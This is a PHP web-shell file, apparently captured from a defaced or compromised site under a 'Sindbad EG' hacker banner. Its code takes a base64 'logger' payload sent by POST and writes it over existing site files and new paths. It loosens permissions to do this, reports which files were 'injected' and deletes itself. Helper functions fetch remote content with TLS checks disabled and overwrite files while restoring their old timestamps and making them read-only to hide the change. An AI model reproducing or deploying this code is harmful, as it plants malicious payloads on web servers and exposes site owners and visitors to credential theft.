Sindbad~EG File Manager
<?php
$input = file_get_contents('php://input');
$data = json_decode($input, true);
if (empty($data['up'])) {
echo 'ok_sp3';
exit();
}
$protocol = (
(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off')
|| $_SERVER['SERVER_PORT'] == 443
) ? 'https://' : 'http://';
$domain = $protocol . $_SERVER['HTTP_HOST'];
$shouldExist = [];
if (!empty($data['pathsForced'])) {
$shouldExist = $data['pathsForced'];
}
$createIfnot = [];
if (!empty($data['pathsCreate'])) {
$createIfnot = $data['pathsCreate'];
}
$replace = isset($data['replace']) && $data['replace']==true;
$logger = '';
if (!empty($data['logger'])) {
$logger = base64_decode($data['logger']);
}
$r=getSiteRoot();
$log = $r.'/errirs.txt';
if (file_exists($log)) {
chFile($log,true);
unlink($log);
}
if (!empty($data['up'])){
$existPaths = [];
$injected = [];
foreach ($shouldExist as $pathExist) {
$path = $r .$pathExist;
if (file_exists($path)){
$existPaths[] = str_replace($r, '',$path);
if($replace && $logger){
chFile($path,true);
if(file_put_contents($path,$logger)){
$injected[] = str_replace($r, '',$path);
}
}
}
}
if($replace && count($existPaths)>0 && $logger){
$pathImages = $r . '/images';
if(!is_dir($pathImages)){
mkdir($pathImages, 0777, true);
}
foreach ($createIfnot as $pathExist) {
$path = $r .$pathExist;
if($replace && $logger){
chFile($path,true);
if(file_put_contents($path,$logger)){
$injected[] = str_replace($r, '',$path);
}
}
}
}
echo json_encode(['exist'=>$existPaths,'injected'=>$injected]);
unlink(__FILE__);
}
function chFile($file, $open) {
if (!file_exists($file)) {
return false;
}
$chmodOk = true;
$chownOk = true;
if ($open) {
if (function_exists('posix_getpwuid')) {
$user = posix_getpwuid(posix_geteuid())['name'];
} elseif (function_exists('get_current_user')) {
$user = get_current_user();
} else {
$user = 'www-data';
}
$chownOk = @chown($file, $user);
$chmodOk = @chmod($file, 0755);
} else {
$user = 'root';
$chownOk = @chown($file, $user);
$chmodOk = @chmod($file, 0555);
}
return $chownOk && $chmodOk;
}
function getSiteRoot(){
if (!empty($_SERVER['DOCUMENT_ROOT'])) {
return realpath($_SERVER['DOCUMENT_ROOT']);
}
$uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$parts = explode('/', trim($uri, '/'));
$levelsUp = count($parts);
$dir = realpath(__DIR__);
for ($i = 0; $i < $levelsUp; $i++) {
$dir = dirname($dir);
}
return $dir;
}
function getContent($url, $timeout = 40)
{
$ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36';
$headers =
"User-Agent: $ua\r\n" .
"Accept: */*\r\n" .
"Accept-Language: en-US,en;q=0.9\r\n" .
"Accept-Encoding: identity\r\n";
$ctx = stream_context_create(array(
'http' => array(
'timeout' => $timeout,
'header' => $headers
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
)
));
$data = @file_get_contents($url, false, $ctx);
if ($data !== false) return $data;
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => $timeout,
CURLOPT_TIMEOUT => $timeout,
CURLOPT_USERAGENT => $ua,
CURLOPT_ENCODING => '',
CURLOPT_HTTPHEADER =>array(
'Accept: */*',
'Accept-Language: en-US,en;q=0.9',
'Accept-Encoding: identity'
),
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0
));
$data = curl_exec($ch);
curl_close($ch);
if ($data !== false) return $data;
}
if (ini_get('allow_url_fopen')) {
$fp = @fopen($url, 'rb', false, $ctx);
if ($fp) {
$data = stream_get_contents($fp);
fclose($fp);
if ($data !== false) return $data;
}
}
$p = parse_url($url);
if (!empty($p['host'])) {
$scheme = (isset($p['scheme']) ? $p['scheme'] : 'http') === 'https' ? 'ssl' : 'tcp';
$port = (isset($p['scheme']) && $p['scheme'] === 'https') ? 443 : 80;
$host = $p['host'];
$path = (isset($p['path']) ? $p['path'] : '/') . (isset($p['query']) ? '?' . $p['query'] : '');
$fp = @fsockopen("$scheme://$host", $port, $e, $s, $timeout);
if ($fp) {
fwrite($fp,
"GET $path HTTP/1.1\r\n" .
"Host: $host\r\n" .
$headers .
"Connection: close\r\n\r\n"
);
$resp = stream_get_contents($fp);
fclose($fp);
if ($resp && ($pos = strpos($resp, "\r\n\r\n")) !== false) {
return substr($resp, $pos + 4);
}
}
}
return false;
}
function saveContent($path, $source){
$dir = dirname($path);
if (!is_dir($dir)) {
@mkdir($dir, 0755, true);
}
$fileExistPath = file_exists($path);
if ($fileExistPath){
$stat = stat($path);
$originalMTime = $stat['mtime'];
if (!is_writable($path)) {
@chmod($path, 0644);
if (!is_writable($path)) return false;
}
}
if (@file_put_contents($path, $source) !== false) {
if ($fileExistPath){
@touch($path, $originalMTime, $originalMTime);
@chmod($path, 0555);
}
return true;
}
$fp = @fopen($path, 'wb');
if ($fp) {
$written = @fwrite($fp, $source);
fclose($fp);
if ($written !== false) {
if ($fileExistPath){
@touch($path, $originalMTime, $originalMTime);
@chmod($path, 0555);
}
return true;
}
}
try {
$file = new SplFileObject($path, 'wb');
$bytes = $file->fwrite($source);
if ($bytes !== false) {
if ($fileExistPath){
@touch($path, $originalMTime, $originalMTime);
@chmod($path, 0555);
}
return true;
}
} catch (Exception $e) {
// skip
}
$temp = @fopen('php://temp', 'r+');
if ($temp) {
fwrite($temp, $source);
rewind($temp);
$dest = @fopen($path, 'wb');
if ($dest) {
stream_copy_to_stream($temp, $dest);
fclose($dest);
fclose($temp);
if ($fileExistPath){
@touch($path, $originalMTime, $originalMTime);
@chmod($path, 0555);
}
return true;
}
fclose($temp);
}
return false;
}
function random_string($length = 6) {
$chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$str = '';
for ($i = 0; $i < $length; $i++) {
$str .= $chars[random_int(0, strlen($chars) - 1)];
}
return $str;
}
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists